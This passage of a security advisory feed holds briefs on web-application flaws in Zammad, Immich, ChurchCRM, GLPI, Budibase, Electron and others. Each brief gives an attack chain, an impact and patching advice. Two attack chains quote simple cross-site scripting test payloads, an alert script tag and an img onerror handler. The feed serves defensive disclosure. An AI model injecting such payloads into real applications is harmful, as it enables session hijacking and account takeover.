open-source helpdesk and customer support system, is susceptible to multiple vulnerabilities. A remote, unauthenticated attacker may exploit these flaws to achieve arbitrary code execution, bypass security restrictions, conduct information disclosure, and launch cross-site scripting (XSS) attacks against users of the application. Successful exploitation of these vulnerabilities poses a significant risk to the confidentiality, integrity, and availability of the Zammad instance and its underlying data. This can lead to data breaches, unauthorized access, and disruption of critical customer support services. Defenders should prioritize patching and implementing mitigations to prevent exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Zammad instance accessible over the network.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a vulnerability that allows bypassing authentication or authorization controls.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a code execution vulnerability to inject and execute malicious code on the Zammad server.\u003c/li\u003e\n\u003cli\u003eThe attacker utilizes the executed code to gain a persistent foothold on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits an information disclosure vulnerability to retrieve sensitive data, such as database credentials or API keys.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to access other internal resources or escalate privileges within the Zammad application.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious JavaScript code into the Zammad application via a Cross-Site Scripting (XSS) vulnerability.\u003c/li\u003e\n\u003cli\u003eWhen other users interact with the injected code, the attacker can steal session cookies or perform actions on their behalf, potentially leading to full account compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of the vulnerabilities in Zammad can lead to complete compromise of the helpdesk system and the exposure of sensitive customer data. Depending on the organization, this could affect thousands of customers and result in significant financial and reputational damage. Sectors relying heavily on customer support, such as technology, retail, and finance, are particularly at risk. An attacker could also leverage a compromised Zammad instance to launch further attacks against internal systems or customers.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect web server logs for unusual activity and potential exploitation attempts targeting the Zammad application.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect potential exploitation of code execution vulnerabilities via web requests.\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) rule to filter out malicious requests attempting to exploit known Zammad vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T08:09:17Z","date_published":"2026-04-09T08:09:17Z","id":"/briefs/2026-04-zammad-vulns/","summary":"Multiple vulnerabilities in Zammad allow a remote attacker to execute arbitrary code, bypass security measures, disclose sensitive information, and perform cross-site scripting attacks.","title":"Multiple Vulnerabilities in Zammad","url":"https://feed.craftedsignal.io/briefs/2026-04-zammad-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-35455"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["immich","xss","cve-2026-35455","webserver"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eImmich, a self-hosted photo and video management solution, is vulnerable to a stored Cross-Site Scripting (XSS) attack.  Specifically, versions prior to 2.7.0 are susceptible. An authenticated attacker can exploit the 360° panorama viewer by uploading a specially crafted equirectangular image that contains malicious text. When another user views the panorama with the OCR overlay enabled, the injected text is extracted via OCR and rendered by the panorama viewer without sanitization. This leads to arbitrary JavaScript execution within the victim\u0026rsquo;s browser. The vulnerability, identified as CVE-2026-35455, poses a significant risk, potentially leading to session hijacking (via persistent API key creation), private photo exfiltration, and unauthorized access to sensitive data like GPS location history and face biometric data. Users are advised to upgrade to version 2.7.0 or later to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker authenticates to an Immich instance with a valid user account.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts an equirectangular image containing malicious JavaScript code embedded within the text.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the crafted image to the Immich server through the web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker shares or otherwise causes another user to view the uploaded panorama image.\u003c/li\u003e\n\u003cli\u003eThe victim views the panorama image with the OCR overlay feature enabled.\u003c/li\u003e\n\u003cli\u003eThe Immich server processes the image, and the OCR engine extracts the malicious JavaScript from the image.\u003c/li\u003e\n\u003cli\u003eThe panorama viewer renders the OCR output via \u003ccode\u003einnerHTML\u003c/code\u003e without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript executes within the victim\u0026rsquo;s browser session, allowing the attacker to perform actions such as session hijacking, data exfiltration, or unauthorized data access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability (CVE-2026-35455) in Immich can lead to severe consequences. An attacker can hijack user sessions by creating persistent API keys, allowing them to impersonate the victim. Furthermore, they can exfiltrate private photos and gain unauthorized access to sensitive information such as GPS location history and face biometric data stored within the Immich instance. The number of potential victims corresponds to the number of users on a vulnerable Immich instance. Given the self-hosted nature of Immich, the impact is largely dependent on the type and sensitivity of data stored within affected deployments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Immich to version 2.7.0 or later to patch the CVE-2026-35455 vulnerability.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for user-uploaded content, particularly images, to prevent XSS attacks. Focus on \u003ccode\u003ewebserver\u003c/code\u003e logs for unusual POST requests.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Immich Panorama Requests\u003c/code\u003e to identify potential exploitation attempts based on unusual URL parameters indicative of crafted panorama requests.\u003c/li\u003e\n\u003cli\u003eMonitor \u003ccode\u003ewebserver\u003c/code\u003e logs for HTTP requests containing suspicious JavaScript payloads within the URL, which may indicate XSS attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T19:25:24Z","date_published":"2026-04-08T19:25:24Z","id":"/briefs/2024-01-immich-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in Immich versions before 2.7.0 allows authenticated users to inject arbitrary JavaScript via crafted equirectangular images, leading to session hijacking, data exfiltration, and unauthorized access.","title":"Immich Stored XSS Vulnerability in 360° Panorama Viewer (CVE-2026-35455)","url":"https://feed.craftedsignal.io/briefs/2024-01-immich-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.6,"id":"CVE-2026-5301"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","cve-2026-5301","web-application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCoolerControl/coolercontrol-ui versions prior to 4.0.0 are vulnerable to a stored Cross-Site Scripting (XSS) vulnerability identified as CVE-2026-5301. This flaw resides in the log viewer component of the application. Unauthenticated attackers can exploit this vulnerability by injecting malicious JavaScript code into log entries. When a user views the log entries containing the malicious script, the script executes within their browser, potentially allowing the attacker to take over the CoolerControl service. The vulnerability was reported by GitLab Inc. and affects versions prior to the release of version 4.0.0. This is a high severity vulnerability because it allows unauthenticated attackers to perform actions as other users in the application.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a CoolerControl/coolercontrol-ui instance running a version prior to 4.0.0.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious log entry containing JavaScript code designed to execute arbitrary actions within a user\u0026rsquo;s session, such as stealing cookies or redirecting to a phishing site.\u003c/li\u003e\n\u003cli\u003eThe attacker injects this malicious log entry into the CoolerControl/coolercontrol-ui system. The method of injection is not specified in the source but could involve exploiting other vulnerabilities or misconfigurations in the system.\u003c/li\u003e\n\u003cli\u003eA user, such as an administrator, accesses the log viewer within the CoolerControl/coolercontrol-ui interface.\u003c/li\u003e\n\u003cli\u003eThe log viewer renders the malicious log entry, causing the injected JavaScript code to execute in the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the user\u0026rsquo;s session or performs other malicious actions, such as stealing credentials or injecting further malicious content into the application.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised session to potentially escalate privileges and gain complete control over the CoolerControl service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5301 can lead to a complete compromise of the CoolerControl service. An attacker could gain unauthorized access to sensitive data, modify system configurations, or use the compromised system as a launchpad for further attacks. Given the nature of XSS vulnerabilities, impact is highly dependent on the privileges of the user whose session is compromised.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade CoolerControl/coolercontrol-ui to version 4.0.0 or later to remediate CVE-2026-5301.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding on all log entries to prevent the injection of malicious scripts.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided below to detect potential exploitation attempts by monitoring for script execution in the context of the CoolerControl/coolercontrol-ui web application.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T13:16:43Z","date_published":"2026-04-08T13:16:43Z","id":"/briefs/2026-04-coolercontrol-xss/","summary":"Unauthenticated attackers can perform a stored XSS attack against CoolerControl/coolercontrol-ui versions less than 4.0.0 by injecting malicious JavaScript into log entries, leading to potential service takeover.","title":"CoolerControl-UI Stored XSS Vulnerability (CVE-2026-5301)","url":"https://feed.craftedsignal.io/briefs/2026-04-coolercontrol-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":5.4,"id":"CVE-2023-38766"},{"cvss":8.7,"id":"CVE-2026-35576"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","web-application","churchcrm"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eChurchCRM, an open-source church management system, is vulnerable to a stored cross-site scripting (XSS) attack affecting versions prior to 7.0.0. This vulnerability resides within the Person Property Management subsystem and stems from insufficient input sanitization when handling dynamically assigned person properties. An authenticated attacker can inject malicious JavaScript code, which is then persistently stored in the database. When other users view the compromised person\u0026rsquo;s profile or access the printable view of that profile, the injected script executes, potentially leading to session hijacking or complete account takeover. This issue impacts versions patched for CVE-2023-38766, highlighting a persistent weakness. Organizations using vulnerable versions of ChurchCRM are at risk of unauthorized access and data breaches. Users are advised to update to version 7.0.0 or later to remediate this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to ChurchCRM with valid user credentials.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the Person Property Management section.\u003c/li\u003e\n\u003cli\u003eAttacker creates or modifies a dynamically assigned person property, injecting malicious JavaScript code into a property field. Example payload: \u003ccode\u003e\u0026lt;script\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/script\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe application stores the malicious payload in the database without proper sanitization.\u003c/li\u003e\n\u003cli\u003eA different user views the profile of the person with the compromised property.\u003c/li\u003e\n\u003cli\u003eThe stored XSS payload is rendered within the user\u0026rsquo;s browser, executing the injected JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s JavaScript code steals the user\u0026rsquo;s session cookie or redirects the user to a phishing page.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session cookie to hijack the user\u0026rsquo;s session and gain unauthorized access to the application, potentially escalating privileges and accessing sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability can lead to session hijacking and full account compromise. Attackers could gain unauthorized access to sensitive church member data, modify records, or perform administrative functions within the ChurchCRM system. The impact ranges from data theft and privacy breaches to complete disruption of church management operations. Given the potential for widespread access to sensitive personal information, organizations are strongly advised to apply the necessary updates to mitigate this risk. The CVSS v3.1 base score for this vulnerability is 8.7, indicating a high severity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade ChurchCRM to version 7.0.0 or later to patch the vulnerability (CVE-2026-35576).\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect potential XSS attempts via crafted property values.\u003c/li\u003e\n\u003cli\u003eReview and audit existing dynamically assigned person properties for suspicious script tags to identify potentially compromised records.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding to prevent future XSS vulnerabilities in ChurchCRM.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T12:00:00Z","date_published":"2026-04-08T12:00:00Z","id":"/briefs/2026-04-churchcrm-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in ChurchCRM versions prior to 7.0.0 allows authenticated users to inject arbitrary JavaScript code via dynamically assigned person properties, leading to potential session hijacking or account compromise when other users view the affected profile.","title":"ChurchCRM Stored XSS Vulnerability in Person Property Management","url":"https://feed.craftedsignal.io/briefs/2026-04-churchcrm-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-25932"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","glpi","cve-2026-25932"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-25932 is a stored cross-site scripting (XSS) vulnerability affecting GLPI, a free asset and IT management software package. The vulnerability exists in versions 0.60 up to, but not including, 10.0.24. An authenticated technician user, with the necessary privileges, can inject a malicious XSS payload into the supplier fields within the GLPI application. This payload is then stored in the database and executed when other users with access to the affected supplier data view the information. This can lead to session hijacking, defacement of the GLPI interface, or other malicious actions performed in the context of the victim user. Successful exploitation requires a valid technician account and user interaction. The vulnerability is patched in GLPI version 10.0.24.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to GLPI as a technician user with sufficient privileges.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the supplier management section of the GLPI interface.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a supplier field vulnerable to XSS (e.g., name, address, contact).\u003c/li\u003e\n\u003cli\u003eAttacker injects a malicious JavaScript payload into the chosen supplier field.\u003c/li\u003e\n\u003cli\u003eThe malicious payload is stored in the GLPI database.\u003c/li\u003e\n\u003cli\u003eA different user (e.g., administrator or another technician) accesses the supplier record containing the XSS payload through the GLPI web interface.\u003c/li\u003e\n\u003cli\u003eThe GLPI application retrieves the supplier data from the database and renders it in the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript code is executed within the context of the victim user\u0026rsquo;s browser, enabling the attacker to perform actions such as stealing cookies, redirecting the user, or modifying data within GLPI.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-25932 can allow an attacker to execute arbitrary JavaScript code within the context of other GLPI users\u0026rsquo; browsers. This can result in session hijacking, where the attacker gains unauthorized access to the victim\u0026rsquo;s GLPI account. The attacker may also be able to deface the GLPI interface or modify data within the application. The CVSS v3.1 score of 7.2 indicates a high potential impact. While the precise number of vulnerable installations is unknown, any organization using GLPI versions 0.60 to 10.0.23 is potentially affected.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade GLPI to version 10.0.24 or later to patch CVE-2026-25932.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect GLPI Suspicious HTTP Referer\u0026rdquo; to identify potential exploitation attempts targeting GLPI.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and output encoding measures to prevent XSS vulnerabilities in GLPI.\u003c/li\u003e\n\u003cli\u003eReview GLPI user permissions and roles to minimize the impact of potential XSS attacks.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity related to GLPI, such as unusual requests or error messages.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T15:17:06Z","date_published":"2026-04-06T15:17:06Z","id":"/briefs/2026-04-glpi-xss/","summary":"CVE-2026-25932 is a cross-site scripting vulnerability in GLPI versions 0.60 to before 10.0.24, where an authenticated technician user can store a malicious XSS payload within supplier fields, potentially leading to arbitrary code execution in the context of other users' browsers.","title":"GLPI Cross-Site Scripting Vulnerability (CVE-2026-25932)","url":"https://feed.craftedsignal.io/briefs/2026-04-glpi-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5425"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","cve-2026-5425","plugin"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Widgets for Social Photo Feed plugin for WordPress, versions up to and including 1.7.9, contains a stored Cross-Site Scripting (XSS) vulnerability (CVE-2026-5425). This vulnerability stems from insufficient input sanitization and output escaping of the \u0026lsquo;feed_data\u0026rsquo; parameter keys. An unauthenticated attacker can exploit this flaw by injecting malicious JavaScript code into the WordPress database. When a user visits a page containing a vulnerable widget, the injected script executes within their browser, potentially leading to session hijacking, account takeover, or other malicious activities. This vulnerability was reported by Wordfence and patched in version 1.8 of the plugin.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe unauthenticated attacker identifies a WordPress site using a vulnerable version (\u0026lt;= 1.7.9) of the Widgets for Social Photo Feed plugin.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the plugin\u0026rsquo;s functionality that handles the \u003ccode\u003efeed_data\u003c/code\u003e parameter. This request contains XSS payload within the parameter keys.\u003c/li\u003e\n\u003cli\u003eThe WordPress server receives the crafted HTTP request. The vulnerable plugin processes the request without proper input sanitization or output escaping.\u003c/li\u003e\n\u003cli\u003eThe malicious XSS payload is stored in the WordPress database, associated with the plugin\u0026rsquo;s settings or data.\u003c/li\u003e\n\u003cli\u003eA legitimate user visits a page on the WordPress site where the affected widget is displayed.\u003c/li\u003e\n\u003cli\u003eThe WordPress server retrieves the plugin data, including the stored XSS payload, from the database.\u003c/li\u003e\n\u003cli\u003eThe server renders the page with the unsanitized XSS payload embedded within the HTML output.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser receives the HTML page containing the malicious script and executes it. This could lead to redirection, information theft, or further compromise of the user\u0026rsquo;s session.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an unauthenticated attacker to execute arbitrary JavaScript code in the context of a website user\u0026rsquo;s browser. This can result in session hijacking, defacement of the website, redirection to malicious sites, or the theft of sensitive information. While the exact number of vulnerable installations is not available, the widespread use of WordPress plugins makes this a potentially significant threat, particularly for sites that do not promptly apply security updates.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Widgets for Social Photo Feed plugin to version 1.8 or later to patch CVE-2026-5425.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect WordPress Social Photo Feed XSS Attempt\u003c/code\u003e to identify exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) rule to filter out requests containing potentially malicious JavaScript code in the \u003ccode\u003efeed_data\u003c/code\u003e parameter.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T09:16:20Z","date_published":"2026-04-04T09:16:20Z","id":"/briefs/2026-04-wordpress-xss/","summary":"The Widgets for Social Photo Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'feed_data' parameter, allowing unauthenticated attackers to inject arbitrary web scripts in pages that will execute when a user accesses the injected page.","title":"WordPress Widgets for Social Photo Feed Plugin Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-wordpress-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.3,"id":"CVE-2026-34780"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["electron","context-isolation","javascript","xss","CVE-2026-34780","defense-evasion","privilege-escalation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eElectron, a framework for building cross-platform desktop applications using web technologies, is vulnerable to a context isolation bypass (CVE-2026-34780) when handling VideoFrame objects. This vulnerability affects Electron versions 39.0.0-alpha.1 to before 39.8.0, 40.0.0-alpha.1 to before 40.7.0, and 41.0.0-alpha.1 to before 41.0.0-beta.8. Specifically, applications are at risk if they utilize \u003ccode\u003econtextBridge.exposeInMainWorld()\u003c/code\u003e to pass a VideoFrame object from a preload script to the main world. An attacker who achieves JavaScript execution in the main world, for example, through a cross-site scripting (XSS) vulnerability, can leverage a bridged VideoFrame to bypass context isolation and gain access to the isolated world, including Node.js APIs exposed to the preload script. This access enables further malicious activities, potentially leading to arbitrary code execution on the host system. Patches are available in versions 39.8.0, 40.7.0, and 41.0.0-beta.8.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies an Electron application using a vulnerable version of Electron (39.0.0-alpha.1 to 39.7.x, 40.0.0-alpha.1 to 40.6.x, or 41.0.0-alpha.1 to 41.0.0-beta.7) that also uses \u003ccode\u003econtextBridge.exposeInMainWorld()\u003c/code\u003e to expose a \u003ccode\u003eVideoFrame\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious JavaScript code into the application\u0026rsquo;s main world. This can be achieved through various means, such as exploiting a cross-site scripting (XSS) vulnerability.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code interacts with the bridged \u003ccode\u003eVideoFrame\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eVideoFrame\u003c/code\u003e object, due to the vulnerability, allows the attacker to bypass context isolation and gain access to the isolated world.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the access to the isolated world to access Node.js APIs that are exposed to the preload script.\u003c/li\u003e\n\u003cli\u003eThe attacker utilizes the exposed Node.js APIs to perform malicious actions, such as reading sensitive data, modifying application settings, or executing arbitrary code on the host system.\u003c/li\u003e\n\u003cli\u003eThe attacker may escalate privileges by exploiting further vulnerabilities or misconfigurations within the application or the underlying operating system.\u003c/li\u003e\n\u003cli\u003eThe final objective is to achieve arbitrary code execution on the host system, allowing the attacker to perform any desired actions.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability (CVE-2026-34780) allows an attacker to bypass context isolation in affected Electron applications, potentially leading to arbitrary code execution. The number of victims depends on the popularity and security posture of Electron applications that bridge VideoFrame objects. If the attack succeeds, an attacker could steal sensitive data, install malware, or completely compromise the user\u0026rsquo;s system. Sectors heavily reliant on Electron-based desktop applications, such as communication, development, and productivity tools, are at higher risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Electron applications to patched versions (39.8.0, 40.7.0, or 41.0.0-beta.8) to address CVE-2026-34780.\u003c/li\u003e\n\u003cli\u003eReview and sanitize all user-supplied input to prevent XSS vulnerabilities that can be leveraged to exploit CVE-2026-34780.\u003c/li\u003e\n\u003cli\u003eImplement strict Content Security Policy (CSP) to mitigate the risk of XSS attacks.\u003c/li\u003e\n\u003cli\u003eMonitor application logs for suspicious JavaScript execution, especially related to \u003ccode\u003eVideoFrame\u003c/code\u003e objects and \u003ccode\u003econtextBridge.exposeInMainWorld()\u003c/code\u003e, to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule for suspicious process execution via Node.js APIs to detect malicious behavior following a successful context isolation bypass.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T01:16:39Z","date_published":"2026-04-04T01:16:39Z","id":"/briefs/2026-04-electron-videoframes/","summary":"A context isolation bypass vulnerability exists in Electron applications that bridge VideoFrame objects via contextBridge, potentially allowing an attacker with JavaScript execution in the main world to access the isolated world and Node.js APIs.","title":"Electron VideoFrame Context Isolation Bypass Vulnerability (CVE-2026-34780)","url":"https://feed.craftedsignal.io/briefs/2026-04-electron-videoframes/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.7,"id":"CVE-2026-35218"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["budibase","xss","cve-2026-35218","web-application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eBudibase, an open-source low-code platform, is vulnerable to a stored cross-site scripting (XSS) attack. Prior to version 3.32.5, the Builder Command Palette renders entity names (tables, views, queries, automations) unsanitized, using Svelte\u0026rsquo;s {@html} directive. This allows an attacker with Builder access to inject arbitrary HTML into the names of database tables, views, queries, or automations. When a Builder-role user in the same workspace opens the Command Palette (Ctrl+K), the injected HTML payload is executed within their browser context. This execution can be leveraged to steal session cookies, leading to full account takeover. The vulnerability, identified as CVE-2026-35218, was patched in Budibase version 3.32.5. Defenders should prioritize upgrading to the patched version.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker authenticates to a Budibase instance with Builder access.\u003c/li\u003e\n\u003cli\u003eThe attacker creates or modifies a database table.\u003c/li\u003e\n\u003cli\u003eThe attacker injects a malicious HTML payload (e.g., \u003ccode\u003e\u0026lt;img src=x onerror=alert(document.domain)\u0026gt;\u003c/code\u003e) into the table name via the Budibase Builder interface.\u003c/li\u003e\n\u003cli\u003eThe attacker saves the modified table.\u003c/li\u003e\n\u003cli\u003eAnother authenticated user with Builder access in the same workspace opens the Command Palette (Ctrl+K).\u003c/li\u003e\n\u003cli\u003eThe Command Palette renders the table name containing the malicious HTML.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the injected HTML, triggering the onerror event and executing JavaScript.\u003c/li\u003e\n\u003cli\u003eThe JavaScript steals the user\u0026rsquo;s session cookie and sends it to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session cookie to impersonate the victim user and gain full account access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to the theft of sensitive user session cookies, allowing an attacker to impersonate legitimate users with Builder access. This can result in unauthorized modification of Budibase applications, exfiltration of sensitive data stored within Budibase, and further compromise of systems integrated with Budibase. The severity is high due to the ease of exploitation for authenticated users and the potential for complete account takeover.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Budibase to version 3.32.5 or later to remediate CVE-2026-35218.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eBudibase_Suspicious_Command_Palette_HTML\u003c/code\u003e to detect potential exploitation attempts by monitoring HTTP activity related to the Command Palette.\u003c/li\u003e\n\u003cli\u003eEnable webserver logging to collect the data required by the Sigma rule \u003ccode\u003eBudibase_Suspicious_Command_Palette_HTML\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T16:16:41Z","date_published":"2026-04-03T16:16:41Z","id":"/briefs/2026-04-budibase-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in Budibase versions prior to 3.32.5 allows authenticated users with Builder access to inject malicious HTML payloads into entity names, leading to potential session cookie theft and account takeover when other Builder users open the Command Palette.","title":"Budibase Stored Cross-Site Scripting Vulnerability (CVE-2026-35218)","url":"https://feed.craftedsignal.io/briefs/2026-04-budibase-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-28754"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","vulnerability","manageengine"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eZohocorp ManageEngine Exchange Reporter Plus versions prior to 5802 are susceptible to a Stored Cross-Site Scripting (XSS) vulnerability within the Distribution Lists report. This flaw allows an attacker with low privileges to inject malicious JavaScript code into the report. When other users view the compromised report, the injected script executes, potentially leading to session hijacking, sensitive data theft, or unauthorized administrative actions. The vulnerability stems from insufficient input sanitization when generating the Distribution Lists report, a feature within the Exchange Reporter Plus application designed to provide insights into Exchange environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to ManageEngine Exchange Reporter Plus with low-privilege credentials.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the Distribution Lists report generation page.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious payload containing JavaScript code designed to execute upon rendering. This payload is injected via a field that contributes to the report.\u003c/li\u003e\n\u003cli\u003eThe application stores the malicious payload without proper sanitization within the Distribution Lists report data.\u003c/li\u003e\n\u003cli\u003eA privileged user views the Distribution Lists report through the web interface.\u003c/li\u003e\n\u003cli\u003eThe stored malicious JavaScript payload is rendered within the 